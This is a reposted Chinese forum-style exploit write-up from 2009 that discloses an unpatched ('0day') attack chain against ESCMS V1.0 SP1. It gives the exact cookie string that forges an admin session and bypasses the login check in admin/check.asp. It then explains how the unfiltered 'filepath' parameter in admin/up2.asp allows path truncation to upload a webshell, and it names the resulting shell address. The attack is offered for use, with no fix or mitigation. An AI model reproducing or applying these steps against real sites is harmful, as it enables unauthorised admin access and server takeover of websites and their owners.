首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>漏洞资料>文章内容 ESCMS 0DAY 来源：http://www.st0p.org 作者：st0p 发布时间：2009-08-20   作者:st0p 转载请注明http://www.st0p.org 版本:ESCMS V1.0 SP1 Build 1125 后台登陆验证是通过admin/check.asp实现的,看代码 <% if Request.cookies(CookiesKey)("ES_admin")="" then '注意这里哦,他是通过COOKIE验证ES_admin是否为空,我们可以伪造一个值,叫他不为空 'CookiesKey在inc/ESCMS_Config.asp文件中,默认为ESCMS$_SP2 Call Err_Show() Response.End() End if ...... %> 首先我们打开http://target.com/admin/es_index.html 然后在COOKIE结尾加上 ; ESCMS$_SP2=ES_admin=st0p; 修改,然后刷新 进后台了嘎.. 然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL,看代码 ...... formPath=upload.form("filepath") '此处没有过滤 if formPath="" then formPath="../Upfile" end if Dim formPath1 formPath1="Upfile/" '在目录后加(/) if right(formPath,1)<>"/" then formPath=formPath&"/" end if for each formName in upload.file '列出所有上传了的文件 set file=upload.file(formName) '生成一个文件对象 if file.filesize<100 then response.write "请先选择你要上传的图片!　[ <a href=# onclick=history.go(-1)>请重新上传</a> ]" response.end end if fileExt=lcase(file.FileExt) if CheckFileExt(fileEXT)=false then response.write "文件格式不正确!　[ <a href=# onclick=history.go(-1)>请重新上传</a> ]" response.end end if 'randomize ranNum=int(90000*rnd)+10000 Dim tempname,temppath tempname=year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt temppath=formPath1&tempname filename=formPath&tempname if file.FileSize>0 then '如果 FileSize > 0 说明有文件数据 result=file.SaveToFile(Server.mappath(filename)) '保存文件,这里地址就会变成我们截断的SHELL名称 ...... 利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交. 嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp 存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败.. 在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了,因为此版本用session来验证登陆… 日啊,又一个YD的洞出来了,不过好似网上不多,而且多是ESCMS V1.0 正式版…..最新版本是我加了作者的群中下的,官方站上的下载地址失效了…   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·XSOK环境变量本地命令执行漏洞 ·N点虚拟主机管理系统 致命漏洞。 ·南方数据企业网站管理系统V10.0 ·动网（DVBBS）Version 8.2.0 后 ·Solaris 10 telnet漏洞及解决 ·破解无线路由器密码，常见无线密 ·Nginx %00空字节执行php漏洞 ·WinWebMail、7I24提权漏洞 ·XPCD xpcd-svga本地缓冲区溢出漏 ·Struts2多个漏洞简要分析 ·ecshop2.72 api.php 文件鸡肋注 ·Discuz!后台拿Webshell 0day   相关文章 ·MS09-044:远程桌面连接中的允许 ·dedecms注入漏洞 影响版本5.3 – ·Discuz!NT 2.5（20080826更新前 ·WordPress 2.8.3高危漏洞 ·国外一Blog程序0day ·嘉缘人才系统漏洞 ·嘉缘人才cms系统最后一个注射漏 ·Dedecms多个鸡肋漏洞分析 ·Dedecms爆路径漏洞 ·各大游戏高危漏洞(魔兽争霸、反 ·IIS6文件格式解析漏洞 ·Overwrite $_FILE array in rfc1   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved